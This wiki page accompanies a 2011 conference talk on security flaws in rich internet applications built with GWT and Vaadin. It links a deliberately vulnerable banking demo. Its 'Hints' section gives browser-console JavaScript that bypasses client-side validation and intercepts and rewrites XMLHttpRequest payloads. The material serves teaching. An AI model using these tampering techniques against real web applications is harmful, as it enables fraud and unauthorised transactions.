FrontPage

RIA Security

WARNING: This wiki page was last edited over a year ago and might be outdated.

RIA Security - Broken By Design

Abstract

Rich Internet Applications (RIA) provide desktop-like usability with web deployment model. The benefits of this combination are obvious and RIA is now common a choice for the presentation layer in many applications. Unfortunately, moving logic from the server to an untrusted client may open up security holes that would not be present in the page-oriented "Web 1.0" architecture.

In this presentation we will take a look at client- and server-side RIA architectures from the security angle, identify some of the most common security problems and discuss strategies for avoiding them. We'll go through some example applications implemented in both architectures and demonstrate the problems. Java-based RIA frameworks, Google Web Toolkit and Vaadin, are used in the examples, but the demonstrated principles are applicable to most other frameworks and languages as well.

Recordings

Here is a HD video recording of the presentation at JavaZone 2011.

Slides

View more presentations from jojule.

PayMate Banking Service

 

I use a simple "paypal" mockup as a demo to show different vulnerabilities. The architecture of the system is as follows:

 

Source code for the system can be downloaded from here: http://dev.vaadin.com/svn/incubator/paymate-security-demo/

The system can be accessed online here: http://jole.virtuallypreinstalled.com/paymate/ (feel free to break in to it :) )

Hints

var gwin = document.body.childNodes[5].contentWindow;
gwin.com_paymate_gwt_client_PayMateApplication_$showErrorNotification__Lcom_paymate_gwt_client_PayMateApplication_2Ljava_lang_String_2Ljava_lang_String_2("WOW", "We made it!");
var gwin = document.body.childNodes[5].contentWindow;
gwin.com_paymate_gwt_client_SendMoney_$validate__Lcom_paymate_gwt_client_SendMoney_2 = function() {return null};
var xhr = document.body.childNodes[5].contentWindow.XMLHttpRequest;
xhr.prototype.originalSend = xhr.prototype.send;
xhr.prototype.send = function(a) {

	var panel = document.createElement("DIV");
	panel.innerHTML = "<div style='position: absolute; top: 100px; left: 100px; z-index: 10000;'>"+
					  "<textarea id='postdata' cols=80 rows=20></textarea>"+
					  "<br/><button id='postbutton'>Post</button></div>";
	document.body.appendChild(panel);
	document.getElementById('postdata').value=a;

	var t = this;
	document.getElementById('postbutton').addEventListener("click",function() {
		t.originalSend(document.getElementById('postdata').value);
		document.body.removeChild(panel);
	}, true);
};

Past Presentations

3 Attachments
14849 Views
Average (2 Votes)
Comments